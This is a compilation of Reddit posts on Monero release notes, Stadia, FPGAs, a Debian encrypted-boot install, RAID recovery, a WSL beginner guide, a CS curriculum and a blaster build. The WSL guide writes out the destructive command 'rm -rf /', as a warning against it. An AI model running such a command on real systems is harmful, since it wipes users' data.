  • Add support for I2P and Tor seed nodes (--tx-proxy; see the example sketch after this list)
  • Add --ban-list daemon option to ban a list of IP addresses
  • Switch to Dandelion++ fluff mode if no out connections for stem mode
  • Fix a bug with relay_tx
  • Fix a rare readline related crash
  • Use /16 filtering on IPv4-within-IPv6 addresses
  • Give all hosts the same chance of being picked for connecting
  • Minor bugfixes
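As a rough illustration of the two new daemon options mentioned above (a sketch only - the exact --tx-proxy argument format here is from memory, so check monerod --help before using it; ban_list.txt is a hypothetical file with one IP or subnet per line):

./monerod --ban-list ban_list.txt --tx-proxy tor,127.0.0.1:9050,10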
Some highlights of this major release are:
  • Support for CLSAG transaction format
  • Deterministic unlock times
  • Enforce claiming maximum coinbase amount
  • Serialization format changes
  • Remove most usage of Boost library
  • Always send raw transactions through P2P, don't use bootstrap daemon
  • Update InProofV1, OutProofV1, and ReserveProofV1 to V2
  • ASM optimizations for wallet refresh (macOS / Linux)
  • Randomized delay when forwarding txes from i2p/tor -> ipv4/6
  • New show_qr_code wallet command for CLI
  • Add ZMQ/Pub support for txpool_add and chain_main events
  • Various bug fixes and performance improvements
Note that you can find a full change log here.

Further remarks

  • A guide on pruning can be found here.
  • Ledger Monero users, please be aware that version 1.7.4 of the Ledger Monero App is required in order to properly use CLI or GUI v0.17.1.3.

Guides on how to get started (GUI)

https://github.com/monero-ecosystem/monero-GUI-guide/blob/master/monero-GUI-guide.md
Older guides: (These were written for older versions, but are still somewhat applicable)
Sheep’s Noob guide to Monero GUI in Tails
https://medium.com/@Electricsheep56/the-monero-gui-wallet-broken-down-in-plain-english-bd2889b8c202

Ledger GUI guides:

How do I generate a Ledger Monero wallet with the GUI (monero-wallet-gui)?
How do I restore / recreate my Ledger Monero wallet?

Trezor GUI guides:

How do I generate a Trezor Monero wallet with the GUI (monero-wallet-gui)?
How to use Monero with Trezor - by Trezor
How do I restore / recreate my Trezor Monero wallet?

Ledger & Trezor CLI guides

Guides to resolve common issues (GUI)

My antivirus (AV) software blocks / quarantines the Monero GUI wallet, is there a work around I can utilize?
I am missing (not seeing) a transaction to (in) the GUI (zero balance)
Transaction stuck as “pending” in the GUI
How do I move the blockchain (data.mdb) to a different directory during (or after) the initial sync without losing the progress?
I am using the GUI and my daemon doesn't start anymore
My GUI feels buggy / freezes all the time
The GUI uses all my bandwidth and I can't browse anymore or use another application that requires internet connection
How do I change the language of the 25 word mnemonic seed in the GUI or CLI?
I am using remote node, but the GUI still syncs blockchain?

Using the GUI with a remote node

In the wizard, you can either select Simple mode or Simple mode (bootstrap) to utilize this functionality. Note that the GUI developers / contributors recommend to use Simple mode (bootstrap) as this mode will eventually use your own (local) node, thereby contributing to the strength and decentralization of the network. Lastly, if you manually want to set a remote node, you ought to use Advanced mode. A guide can be found here:
https://www.getmonero.org/resources/user-guides/remote_node_gui.html

Adding a new language to the GUI

https://github.com/monero-ecosystem/monero-translations/blob/master/weblate.md
If, after reading all these guides, you still require help, please post your issue in this thread and describe it in as much detail as possible. Also, feel free to post any other guides that could help people.
submitted by dEBRUYNE_1 to Monero

Allow me to explain how traditional game "patching" by developers, as on consoles and even PC, is not always required for games to run better on Stadia over time... Stadia engineers can keep improving the visual quality of individual library titles on their own.

I've been mulling over how to write this post without it getting too wordy and turning people away from the topic... but I feel it's important for people to consider in regards to investing in game purchases on Stadia. Even though a years-old game is ported to Stadia by a 3rd party publisher, it is not abandoned once that developer is no longer making game engine code changes... from that point the Stadia team can take over tweaking the performance of the game as the Linux OS kernel / Vulkan API / and eventually the hardware undergo improvements over time.
I've seen heated comments/reactions in these parts when people start noticing older games suddenly looking or performing better... even though there is no sign of a game patch from the developer or any announcement that such a thing has happened. (FFXV.) I'm here to explain how this is totally possible.
(Disclaimer: I've been a gaming platform tester for 13 years, on a platform based on the Gentoo Linux kernel. This year I have branched directly into OS kernel / package testing itself.)
A software package / game is made up of more than just game code and pretty graphics. Another fairly big piece of the puzzle is configuration files, especially in the Linux world. Another thing about Linux is that it never sits still. It's open source and ever growing and improving through constant iteration by engineers around the world. This includes the Vulkan API itself. Stadia's platform and Vulkan API have likely undergone dozens if not hundreds of iterations in the past year alone. It is CONSTANTLY improving, even if ever so slightly.
For comparison, a gaming console is a completely sealed environment. Not only does the hardware never change, but the OS and base platform have very little wiggle room for improvement. Most significant improvements will happen within the first few years of a new console's life. But often the gains from that never spill over into the games themselves... rather they go to the platform's UI and menus, such as adding new features outside of the game. For things to change about a game at all, a patch MUST be delivered to the console. There is no other option, because the config files of individual games can't be touched in any other way.
On PC you often have access to these config files (at the developer's discretion of what they choose to expose, of course). Many people know how you can start digging into these settings and adjust number values and flip flags on/off to affect your game. But these configuration files have default values set by the developers that are expected to never really be touched by the players... so even when they do want to change something for the benefit of everyone, they need to issue a game patch.
Now on a cloud platform such as Stadia, when a game is delivered by a developer to the platform, of course their game engine code (binaries) cannot be altered by anyone but the game developer themselves, as usual... so if there are bugs in the code, or game engine code improvements to be made, the developer must deploy a game patch, as we have seen and as people would expect. However, the configuration files which define how the game performs on the platform's hardware are completely exposed... and this is what the Stadia team most likely has FULL control over. So if the Vulkan API gets some improvements or code optimizations, and they can squeeze a little bit more performance out of the game, the Stadia team can go into these config files and adjust things accordingly.
Not only configurations but also the graphical assets themselves (media) can be swapped for higher-res versions. It's also very possible that the publishers/devs provide Stadia with multiple versions of their media at different quality levels - some higher-res textures that can be swapped in if the platform is optimized enough to handle them, etc.
Why would the Stadia team take on the management of all the games in such a way? Because it's absolutely in their best interest to. This is also a big favor towards the game publisher as well... Stadia does the work to improve the game, ultimately generating better reception and sales of these games, producing revenue for both Stadia and the publisher.
Cloud platforms are a new animal in the gaming world. How the games are maintained over time can be done very differently than what we are used to with console and PC.
So naturally this turned into a wall of text but I couldn't do it any other way... some things simply need to be explained as clearly as possible to get across.
tl;dr: As the Stadia platform / Vulkan API improve constantly over time, Stadia engineers can tweak the configurations of ANY game to make it look/run better without the developers needing to be involved and patch the games.
submitted by Z3M0G to Stadia

Some Background and Thoughts on FPGAs

I have been lurking on this board for a few years. I decided the other day to finally create an account so I could come out of lurk mode. As you might guess from my id I was able to retire at the beginning of this year on a significantly accelerated timetable thanks to the 20x return from my AMD stock and option investments since 2016.
I spent my career working on electronics and software for the satellite industry. We made heavy use of FPGAs and more often than not Xilinx FPGAs since they had a radiation tolerant line. I thought I would summarize some of the ways they were used in and around the development process. My experience is going to be very different than the datacenter settings in the last few years. The AI and big data stuff was a pipe dream back then.
In the olden times of the 90s we used CPUs which unlike modern processors did not include much in the way of I/O and memory controller. The computer board designs graduated from CPU + a bunch of ICs (much like the original IBM PC design) to a CPU + Xilinx FPGA + RAM + ROM and maybe a 5V or 3.3V linear voltage regulator. Those old FPGAs were programmed before they were soldered to the PCB using a dedicated programming unit attached to a PC. Pretty much the same way ROMs were programmed. At the time FPGAs gate capacity was small enough that it was still feasible to design their implementation using schematics. An engineer would draw up logic gates and flip-flops just like you would if using discrete logic ICs and then compile it to the FPGA binary and burn it to the FPGA using a programmer box like a ROM. If you screwed it up you had to buy another FPGA chip, they were not erasable. The advantage of using the FPGA is that it was common to implement a custom I/O protocol to talk to other FPGAs, on other boards, which might be operating A/D and D/A converters and digital I/O driver chips. As the FPGA gate capacities increased the overall board count could be decreased.
With the advent of much larger FPGAs that were in-circuit re-programmable they began to be used for prototyping ASIC designs. One project I worked on was developing a radiation hardened PowerPC processor ASIC with specialized I/O. A Xilinx FPGA was used to test the implementation at approximately half-speed. The PowerPC core was licensed IP and surrounded with bits that were developed in VHDL. In the satellite industry the volumes are typically not high enough to warrant developing ASICs but they could be fabbed on a rad-hard process while the time large capacity re-programmable FPGAs were not. Using FPGAs for prototyping the ASIC was essential because you only had one chance to get the ASIC right, it was cost and schedule prohibitive to do any respins.
Another way re-programmable FPGAs were used was for test equipment and ground stations. The flight hardware had these custom designed ASICs of all sorts which generally created data streams that would be transmitted down from space. It was advantageous to test the boards without the full set of downlink and receiver hardware, so a commercial FPGA board in a PC would be used to hook into the data bus in place of the radio. Similarly, other test equipment would be made which emulated the data stream from the flight hardware so that the radio hardware could be tested independently. Finally, the ground stations would often use FPGAs to pull in the digital data stream from the receiver radio and process the data in real-time. These FPGAs were typically programmed using VHDL, but as tools progressed it became possible to program the entire PC + FPGA board combination using LabView or Simulink, which also handled the UI. In the 2000s it was even possible to program a real-time software defined radio using these tools.
As FPGAs progressed they became much more sophisticated. Instead of only having to specify whether an I/O pin was digital input or output you could choose between high speed, low speed, serdes, analog etc. Instead of having to interface to external RAM chips they began to include banks of internal RAM. That is because FPGAs were no longer just gate arrays but included a quantity of "hard-core" functionality. The natural progression of FPGAs with hard cores brings them into direct competition with embedded processor SOCs. At the same time embedded SOCs have gained flexibility with I/O pin assignment which is very similar to what FPGAs allow.
It is important to understand that in the modern era of chip design the difference between the teams that AMD and Xilinx has for chip design is primarily at the architecture level. Low level design and validation are going to largely be the same (although they may be using different tools and best practices). There are going to be some synergies in process and there is going to be some flexibility in having more teams capable of bringing chips to market. They are going to be able to commingle the best practices between the two which is going to be a net boost to productivity for one side or the other or both. Furthermore AMD will have access to Xilinx FPGAs for design validation at cost and perhaps ahead of release and Xilinx will be able to leverage AMD's internal server clouds. The companies will also have access to a greater number of Fellow level architects and process gurus. Also AMD has internally developed IP blocks that Xilinx could leverage and vice versa. Going forward there would be savings on externally licensed IP blocks as well.
AI is all the rage these days but there are many other applications for generic FPGAs and for including field programmable gates in sophisticated SOCs. As the grand convergence continues I would not be surprised at all to see FPGA as much a key component of future chips as graphics are in an APU. If Moore's law is slowing down then the ability to reconfigure the circuitry on the fly is a potential mitigation. At some point being able to reallocate the transistor budget on the fly is going to win out over adding more and more fixed functionality. Going a bit down the big.LITTLE path, what if a core could be reconfigured on the fly to be integer heavy or 64-bit float heavy within the same transistor budget? Instead of dedicated video encoders/decoders or AVX-512 that sits dark most of the time, the OS could gin it up on demand. In a laptop or phone setting this could be a big improvement.
If anybody has questions I'd be happy to answer. I'm sure there are a number of other posters here with a background in electronics and chip design who can weigh in as well.
submitted by RetdThx2AMD to AMD_Stock

Looking for suggestions to improve encrypted /boot on Debian

Below is my install procedure
# For starting from install disc:
# Advanced Options -> Rescue mode -> Execute shell in Installer environment
# For this example we are assuming the drive we want to set up is /dev/sda

# Format the drive to have 1 large primary partition and mark it as bootable
echo -e "o\nn\np\n1\n\n\na\nw" | fdisk /dev/sda

# Encrypt entire volume
# Default iter is 2000 and takes 22 seconds for grub to decrypt, adjust accordingly
cryptsetup -v --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 50000 --use-random --verify-passphrase luksFormat --type luks1 /dev/sda1
# or if that takes too long to type:
# cryptsetup -v -c aes-xts-plain64 -s 512 -h sha512 --use-random -y luksFormat --type luks1 /dev/sda1

# Open for formatting
cryptsetup open /dev/sda1 sda1_crypt
mkfs.xfs /dev/mapper/sda1_crypt

# If you are doing this from a standard debian system and you don't have debootstrap run the following:
# apt install -y debootstrap coreutils

# bootstrap core
mount /dev/mapper/sda1_crypt /mnt
debootstrap --arch amd64 bullseye /mnt http://ftp.us.debian.org/debian/
## If you see:
# E: Invalid Release file, no entry for main/binary-$ARCH/Packages
# known good values are amd64 and i386
## It means you provided an invalid Architecture name (like x86_64 or x86)

# Chroot to get to work
mount -t proc none /mnt/proc
mount --bind /sys /mnt/sys
mount --bind /dev /mnt/dev
cp /etc/resolv.conf /mnt/etc/resolv.conf
chroot /mnt/

3. Basic setup

## Optionally you can add the following lines to /etc/apt/sources.list
# deb http://ftp.us.debian.org/debian bullseye main
# deb-src http://ftp.us.debian.org/debian bullseye main
# deb http://ftp.debian.org/debian/ bullseye-updates main
# deb-src http://ftp.debian.org/debian/ bullseye-updates main
# deb http://security.debian.org/ bullseye/updates main
# deb-src http://security.debian.org/ bullseye/updates main

# *DO NOT FORGET TO SET ROOT PASSWORD!*
passwd
apt update
apt install -y locales debconf
# For rescue mode you need to run:
# export TERM=vt100
dpkg-reconfigure locales
# Restore old value:
# export TERM=bterm
apt install -y sudo vim mg
apt purge -y nano
select-editor

# You need to set up your /etc/fstab:
echo -e "/dev/mapper/sda1_crypt\t/\txfs\tdefaults\t0\t0" > /etc/fstab
# Now to inform initramfs what to pass
blkid | grep '/dev/sda1:' | echo -e "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\tnone\tluks" > /etc/crypttab

# Make sure to install grub to /dev/sdb so that you don't mess up your desktop.
grep -v rootfs /proc/mounts > /etc/mtab
apt install -y grub-pc linux-base linux-image-amd64 cryptsetup
## If you see:
# E: Sub-process /usr/bin/dpkg returned an error code (1)
## Don't worry about it, we are going to fix it later

# Turn on grub's support for crypto
echo 'GRUB_ENABLE_CRYPTODISK=y' >> /etc/default/grub
grub-mkconfig -o /boot/grub/grub.cfg
grub-install /dev/sda
update-initramfs -u -k all
## If you see:
# cryptsetup: WARNING: Invalid source device $UUID
## You forgot to prefix UUID= before your id in /etc/crypttab

*You can now reboot and finish the rest in the system*

# Since we are manually setting everything up:
export HOSTNAME=concernedgnu
{ cat <<-EOF
127.0.0.1 localhost
127.0.1.1 $HOSTNAME

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
EOF
} >| /etc/hosts

# Add our first user, set their password and add them to sudo
useradd -m [User]
passwd [User]
usermod -G sudo -a [User]
chsh [User]

# Fix the broken packages
apt install -f
# Turn on network so we can add packages
dhclient
# Install posix standard tools
apt update
tasksel install standard
# Add network-manager
apt install -y network-manager
nmtui

# Remove need to type luks password twice
dd bs=512 count=4 if=/dev/urandom of=/crypto_keyfile.bin
chmod 400 /crypto_keyfile.bin
cryptsetup luksAddKey /dev/sda1 /crypto_keyfile.bin
# in /etc/crypttab replace none with /crypto_keyfile.bin
blkid | grep '/dev/sda1:' | echo -e "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\t/crypto_keyfile.bin\tluks,keyscript=file" > /etc/crypttab

# create /usr/share/initramfs-tools/hooks/file (750 permissions) with the below content:
:::::::::::::: START ::::::::::::::
#!/bin/bash
set -e
PREREQ="cryptroot"
prereqs()
{
    echo "$PREREQ"
}
case $1 in
    prereqs)
        prereqs
        exit 0
        ;;
esac
. /usr/share/initramfs-tools/hook-functions
# Hooks for loading keyctl software into the initramfs
copy_exec /crypto_keyfile.bin
exit 0
:::::::::::::: END ::::::::::::::
chmod 750 /usr/share/initramfs-tools/hooks/file

# and then create its match in /lib/cryptsetup/scripts/file (750 permissions) with the following content:
:::::::::::::: START ::::::::::::::
#!/bin/sh
decrypt_file () {
    cat "$1"
    return 0
}
if [ -z "$1" ]; then
    echo "$0: missing key as argument" >&2
    exit 1
fi
decrypt_file "$1"
exit $?
:::::::::::::: END ::::::::::::::
chmod 750 /lib/cryptsetup/scripts/file
update-initramfs -u -k all
# You can verify that the keyfile and /lib/cryptsetup/scripts/file are both in the initrd with:
lsinitramfs /boot/initrd.img-* | less

*You may now logout and finish the rest as user*

# Install Desktop utils if required
sudo apt install -y xinit slim i3-wm dmenu x11-xserver-utils
# If you skipped the guix option for space reasons:
# sudo apt install -y gpg rxvt-unicode emacs git tig most firefox-esr
submitted by concernedgnu20190124 to linuxadmin [link] [comments]

Help with RAID 6 recovery

Back around 2008, I built a machine with a 3ware RAID controller, and set up 15 1TB drives in RAID 6.
At some point in maybe 2010, I had 3 (or maybe only 2) drives fail due to (most likely) overheating. I was unable to rebuild the array at the time, even with swapping out the failed drive/s. I don't remember the details.
More than a decade later, I still have all 15 drives, in a box, labeled with their order, and the original 3ware controller, and a desiccant pack.
I have no idea if the drives still work, but I am finally ready to try to recover the data from them, assuming they still work.
After a bit of duckduckgo-ing, it appears that I really only have 2 options - use recovery software or use a recovery service where I ship out my drives. The data on these drives, while nice to have, is not worth me sending them to a 3rd party. I am, however, willing to spend a little money on the recovery software if I need to.
Based on my searching, it appears that there are 3 viable options: * https://www.diskinternals.com/raid-recovery/ * https://www.stellarinfo.com/article/raid6-data-recovery.php * http://www.freeraidrecovery.com/
The Diskinternals solution looks like it may be the easiest, but I'm not sure what to expect when I actually try to use it.
The Stellar one looks good as well - it has instructions with screenshots and I was able to find a video of someone actually using it. But it needs some technical parameters that I have no idea how to retrieve - maybe I could hook up the old controller and read them by accessing the controller from the bios? I will try that once I'm ready to get my hands dirty.
The ReclaiMe one appears to be easy and free, claiming that it will automatically determine the parameters that Stellar expects you to supply. Seems too good to be true, especially as a free product. Their site and their claims make me not trust them...
So to get started on this project, the very first thing I want to do is take some kind of image of each of the 15 drives. Do any of you have recommendations for the best way to do this? The first step in Diskinternals' instructions (which are on this separate page for some reason - https://www.diskinternals.com/raid-recovery/raid-6-data-recovery/) lists creating a "binary image" of the disk/s. Once I do this, then do I need to mount it somehow? Do I need some separate program to do that in Windows? I know that I can (and will) look this up, but taking an image of known corrupted drives for the purposes of RAID data recovery with specialized recovery software seems to be a pretty special case, and I want to make sure that the image I take is what will be needed to attempt the recovery. I don't know how many times I'll be able to read from these old drives.
I did a little searching before posting this about disk imaging/cloning - it seems like I need an image, not a clone. Clonezilla looks like the best option (and I've used it before). I've heard good things about Acronis, but their new pricing model turns me off. Most of the alternatives to Clonezilla (Acronis, Paragon, Macrium) don't have technical-enough language to earn my trust. I also took a look at isobuster, because that's a program I already have, but it looks like its ability to take raw images does not include HDDs.
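One approach worth considering (a sketch only, assuming the disks are imaged from a Linux live USB and enumerate as /dev/sdb, /dev/sdc, and so on) is GNU ddrescue, which reads each drive once, skips and logs bad sectors to a map file, and can resume if a drive drops out:

sudo apt install gddrescue 
# one raw image plus one map file per member disk; -d uses direct disc access, -r3 retries bad areas 3 times 
sudo ddrescue -d -r3 /dev/sdb drive01.img drive01.map 
sudo ddrescue -d -r3 /dev/sdc drive02.img drive02.map 

The resulting flat binary images should be the kind of file the recovery tools above ask for, and the original drives only ever get read once.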
A quick search of datahoarder using the search term "raid 6" didn't bring up any posts that had addressed this scenario - most were about swapping/rebuilding.
Any help, guidance, insight, etc. is appreciated. Thanks!
submitted by brainthinks to DataHoarder [link] [comments]

An introduction to Linux through Windows Subsystem for Linux

I'm working as an Undergraduate Learning Assistant and wrote this guide to help out students who were in the same boat I was in when I first took my university's intro to computer science course. It provides an overview of how to get started using Linux, guides you through setting up Windows Subsystem for Linux to run smoothly on Windows 10, and provides a very basic introduction to Linux. Students seemed to dig it, so I figured it'd help some people in here as well. I've never posted here before, so apologies if I'm unknowingly violating subreddit rules.

An introduction to Linux through Windows Subsystem for Linux

GitHub Pages link

Introduction and motivation

tl;dr skip to next section
So you're thinking of installing a Linux distribution, and are unsure where to start. Or you're an unfortunate soul using Windows 10 in CPSC 201. Either way, this guide is for you. In this section I'll give a very basic intro to some of the options you've got at your disposal, and explain why I chose Windows Subsystem for Linux among them. All of these have plenty of documentation online so Google if in doubt.

Setting up WSL

So if you've read this far I've convinced you to use WSL. Let's get started with setting it up. The very basics are outlined in Microsoft's guide here, I'll be covering what they talk about and diving into some other stuff.

1. Installing WSL

Press the Windows key (henceforth Winkey) and type in PowerShell. Right-click the icon and select run as administrator. Next, paste in this command:
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart 
Now you'll want to perform a hard shutdown on your computer. This can become unnecessarily complicated because of Windows' fast startup feature, but here we go. First try pressing the Winkey, clicking on the power icon, and selecting Shut Down while holding down the shift key. Let go of the shift key and the mouse, and let it shut down. Great! Now open up Command Prompt and type in
wsl --help 
If you get a large text output, WSL has been successfully enabled on your machine. If nothing happens, your computer failed at performing a hard shutdown, in which case you can try the age-old technique of just holding down your computer's power button until the computer turns itself off. Make sure you don't have any unsaved documents open when you do this.
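If neither of those approaches works, one more option (assuming a standard Windows 10 setup) is the shutdown command, which should perform a full shutdown rather than the fast-startup hybrid one. Run it from Command Prompt or PowerShell and then power the machine back on:

shutdown /s /f /t 0 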

2. Installing Ubuntu

Great! Now that you've got WSL installed, let's download a Linux distro. Press the Winkey and type in Microsoft Store. Now use the store's search icon and type in Ubuntu. Ubuntu is a Debian-based Linux distribution, and seems to have the best integration with WSL, so that's what we'll be going for. If you want to be quirky, here are some other options. Once you type in Ubuntu three options should pop up: Ubuntu, Ubuntu 20.04 LTS, and Ubuntu 18.04 LTS.
![Windows Store](https://theshepord.github.io/intro-to-WSL/docs/images/winstore.png) Installing plain-old "Ubuntu" will mean the app updates whenever a new major Ubuntu distribution is released. The current version (as of 09/02/2020) is Ubuntu 20.04.1 LTS. The other two are older distributions of Ubuntu. For most use-cases, i.e. unless you're running some software that will break when upgrading, you'll want to pick the regular Ubuntu option. That's what I did.
Once that's done installing, again hit Winkey and open up Ubuntu. A console window should open up, asking you to wait a minute or two for files to de-compress and be stored on your PC. All future launches should take less than a second. It'll then prompt you to create a username and password. I'd recommend sticking to whatever your Windows username and password is so that you don't have to juggle around two different user/password combinations, but up to you.
Finally, to upgrade all your packages, type in
sudo apt-get update 
And then
sudo apt-get upgrade 
apt-get is the Ubuntu package manager, this is what you'll be using to install additional programs on WSL.
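For example, if you later need a compiler, a debugger, and git for coursework, the same package manager handles it (these are just the common Ubuntu package names):

sudo apt-get install gcc gdb make git 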

3. Making things nice and crispy: an introduction to UNIX-based filesystems

tl;dr skip to the next section
The two above steps are technically all you need for running WSL on your system. However, you may notice that whenever you open up the Ubuntu app your current folder seems to be completely random. If you type in pwd (for Print Working Directory, 'directory' is synonymous with 'folder') inside Ubuntu and hit enter, you'll likely get some output akin to /home/<your-ubuntu-username>. Where is this folder? Is it my home folder? Type in ls (for LiSt) to see what files are in this folder. Probably you won't get any output, because surprise surprise this folder is not your Windows home folder and is in fact empty (okay it's actually not empty, which we'll see in a bit. If you type in ls -a, a for All, you'll see other files but notice they have a period in front of them. This is a convention for specifying files that should be hidden by default, and ls, as well as most other commands, will honor this convention. Anyways).
So where is my Windows home folder? Is WSL completely separate from Windows? Nope! This is Windows Subsystem for Linux after all. Notice how, when you typed pwd earlier, the address you got was /home/<your-ubuntu-username>. Notice that forward-slash right before home. That forward-slash indicates the root directory (not to be confused with the /root directory), which is the directory at the top of the directory hierarchy and contains all other directories in your system. So if we type ls /, you'll see the top-most directories in your system. Okay, great. They have a bunch of seemingly random names. Except, shocker, they aren't random. I've provided a quick run-down in Appendix A.
For now, though, we'll focus on /mnt, which stands for mount. This is where your C drive, which contains all your Windows stuff, is mounted. So if you type ls /mnt/c, you'll begin to notice some familiar folders. Type in ls /mnt/c/Users, and voilà, there's your Windows home folder. Remember this filepath, /mnt/c/Users/<your-windows-username>. When we open up Ubuntu, we don't want it tossing us in this random /home/<your-ubuntu-username> directory, we want our Windows home folder. Let's change that!
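As a quick sanity check, try jumping straight into your Windows documents from inside Ubuntu (swap lucas for your own Windows username):

cd /mnt/c/Users/lucas/Documents 
ls 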

4. Changing your default home folder

Type in sudo vim /etc/passwd. You'll likely be prompted for your Ubuntu's password. sudo is a command that gives you root privileges in bash (akin to Windows's right-click then selecting 'Run as administrator'). vim is a command-line text-editing tool, which out-of-the-box functions kind of like a crummy Notepad (you can customize it infinitely though, and some people have insane vim setups. Appendix B has more info). /etc/passwd is a plaintext file that historically was used to store passwords back when encryption wasn't a big deal, but now instead stores essential user info used every time you open up WSL.
Anyway, once you've typed that in, your shell should look something like this: ![vim /etc/passwd](https://theshepord.github.io/intro-to-WSL/docs/images/vim-etc-passwd.png)
Using arrow-keys, find the entry that begins with your Ubuntu username. It should be towards the bottom of the file. In my case, the line looks like
theshep:x:1000:1000:,,,:/home/pizzatron3000:/bin/bash 
See that cringy, crummy /home/pizzatron3000? Not only do I regret that username to this day, it's also not where we want our home directory. Let's change that! Press i to initiate vim's -- INSERT -- mode. Use arrow-keys to navigate to that section, and delete /home/<your-ubuntu-username> by holding down backspace. Remember that filepath I asked you to remember? /mnt/c/Users/<your-windows-username>. Type that in. For me, the line now looks like
theshep:x:1000:1000:,,,:/mnt/c/Users/lucas:/bin/bash 
Next, press esc to exit insert mode, then type in the following:
:wq 
The : tells vim you're inputting a command, w means write, and q means quit. If you've screwed up any of the above sections, you can also type in :q! to exit vim without saving the file. Just remember to exit insert mode by pressing esc before inputting commands, else you'll instead be writing to the file.
Great! If you now open up a new terminal and type in pwd, you should be in your Windows home folder! However, things seem to be lacking their usual color...

5. Importing your configuration files into the new home directory

Your home folder contains all your Ubuntu and bash configuration files. However, since we just changed the home folder to your Windows home folder, we've lost these configuration files. Let's bring them back! These configuration files are hidden inside /home/<your-ubuntu-username>, and they all start with a . in front of the filename. So let's copy them over into your new home directory! Type in the following:
cp -r /home/<your-ubuntu-username>/. ~ 
cp stands for CoPy, -r stands for recursive (i.e. descend into directories), the . at the end is cp-specific syntax that lets it copy anything, including hidden files, and the ~ is a quick way of writing your home directory's filepath (which would be /mnt/c/Users/<your-windows-username>) without having to type all that in again. Once you've run this, all your configuration files should now be present in your new home directory. Configuration files like .bashrc, .profile, and .bash_profile essentially provide commands that are run whenever you open a new shell. So now, if you open a new shell, everything should be working normally. Amazing. We're done!
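To double-check that the hidden configuration files actually made it over, list everything in your new home directory; you should see entries like .bashrc and .profile:

ls -a ~ 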

6. Tips & tricks

Here are two handy commands you can add to your .profile file. Run vim ~/.profile, then, type these in at the top of the .profile file, one per line, using the commands we discussed previously (i to enter insert mode, esc to exit insert mode, :wq to save and quit).
alias rm='rm -i' makes it so that the rm command will always ask for confirmation when you're deleting a file. rm, for ReMove, is like a Windows delete except literally permanent and you will lose that data for good, so it's nice to have this extra safeguard. You can type rm -f to bypass. Linux can be super powerful, but with great power comes great responsibility. NEVER NEVER NEVER type in rm -rf /, this is saying 'delete literally everything and don't ask for confirmation', your computer will die. Newer versions of rm fail when you type this in, but don't push your luck. You've been warned. Be careful.
export DISPLAY=:0: if you install VcXsrv (XLaunch), this line allows you to open graphical interfaces through Ubuntu. The export sets the environment variable DISPLAY, and the :0 tells Ubuntu that it should use the localhost display.

Appendix A: brief intro to top-level UNIX directories

tl;dr only mess with /mnt, /home, and maybe maybe /usr. Don't touch anything else.
  • bin: binaries, contains Ubuntu binary (aka executable) files that are used in bash. Here you'll find the binaries that execute commands like ls and pwd. Similar to /usr/bin, but bin gets loaded earlier in the booting process so it contains the most important commands.
  • boot: contains information for operating system booting. Empty in WSL, because WSL isn't an operating system.
  • dev: devices, provides files that allow Ubuntu to communicate with I/O devices. One useful file here is /dev/null, which is basically an information black hole that automatically deletes any data you pass it.
  • etc: no idea why it's called etc, but it contains system-wide configuration files
  • home: equivalent to Windows' C:/Users folder, contains home folders for the different users. In an Ubuntu system, under /home/<username> you'd find the Documents folder, Downloads folder, etc.
  • lib: libraries used by the system
  • lib64 64-bit libraries used by the system
  • mnt: mount, where your drives are located
  • opt: third-party applications that (usually) don't have any dependencies outside the scope of their own package
  • proc: process information, contains runtime information about your system (e.g. memory, mounted devices, hardware configurations, etc)
  • run: directory for programs to store runtime information.
  • srv: server folder, holds data to be served in protocols like ftp, www, cvs, and others
  • sys: system, provides information about different I/O devices to the Linux Kernel. If dev files allow you to access I/O devices, sys files tell you information about these devices.
  • tmp: temporary, these are system runtime files that are (in most Linux distros) cleared out after every reboot. It's also sort of deprecated for security reasons, and programs will generally prefer to use run.
  • usr: contains additional UNIX commands, header files for compiling C programs, among other things. Kind of like bin but for less important programs. Most of everything you install using apt-get ends up here.
  • var: variable, contains variable data such as logs, databases, e-mail etc, but that persist across different boots.
Also keep in mind that all of this is just convention. No Linux distribution needs to follow this file structure, and in fact almost all will deviate from what I just described. Hell, you could make your own Linux fork where /mnt/c information is stored in tmp.

Appendix B: random resources

EDIT: implemented various changes suggested in the comments. Thanks all!
submitted by HeavenBuilder to linux4noobs [link] [comments]

"From the Transistor to the Web Browser" George Hotz CS Curriculum

Found this on George Hotz's Github. Thinking of following this curriculum to get into CS. Would love to know everyone's thoughts. The only thing this curriculum lacks is links and resources.

Credit: https://github.com/geohot/fromthetransistor
"Hiring is hard, a lot of modern CS education is really bad, and it's hard to find people who understand the modern computer stack from first principles.
Now cleaned up and going to be software only. Closer to being real.

Section 1: Intro: Cheating our way past the transistor -- 0.5 weeks

Section 2: Bringup: What language is hardware coded in? -- 0.5 weeks

Section 3: Processor: What is a processor anyway? -- 3 weeks

Section 4: Compiler: A “high” level language -- 3 weeks

Section 5: Operating System: Software we take for granted -- 3 weeks

Section 6: Browser: Coming online -- 1 week

Section 7: Physical: Running on real hardware -- 1 week

submitted by Cyandemption to cscareerquestions [link] [comments]

HPA FDL-3 "WTFDL-3" | Select Fire | Variable FPS, DPS, pressure

HPA FDL-3
I had a Super Core lying about collecting dust, but I really felt in the mood to build myself a new FDL-3... The problem is that FDL's are flywheelers, and to be honest, I already have 4 of them.. And so what would any self respecting Nerfer do in my position? Mod. And mod I did...

Virtually every part of the FDL has been modified to make this work. Some parts are obvious and quite extensive - such as installing a Super Core and air system where you had a pusher and electronics, and the creation of a matching bottle stock.. But other parts were less so.. Such as changing the position of the magazine within the magwell, adjusting the mag release components to suit, realignment of screw holes and wiring runs.. That sort of thing.. Plus with the massive cantilevered barrel and air bottle, a lot of design has gone into ensuring that the blaster can support it while surviving the crucible of war. Maybe 4 or 5 minor pieces are untouched.

But it's not enough to just chuck in some HPA components - in the spirit of the FDL, it has to be teched out, fully configurable, and per my more recent builds, closed loop. This brings us to the crux of the matter, it has the following features:
  • Narfduino with OLED console
  • Software controlled air pressure (i.e. turn the dial for more or less power)
  • Variable FPS configured separately for Auto and Burst
  • Select fire - Semi-auto, burst, full auto, binary trigger, and ramped (you map the modes you want to the buttons in the config screen) and a range of configuration options for each
  • Dual profile settings
  • Ammo counter with reset on mag change
  • Tournament lock to cap the maximum air pressure
  • Auto jam detection / air out, and battery protection
  • Open-bolt configuration
  • Spectre composite barrel and acetal scar

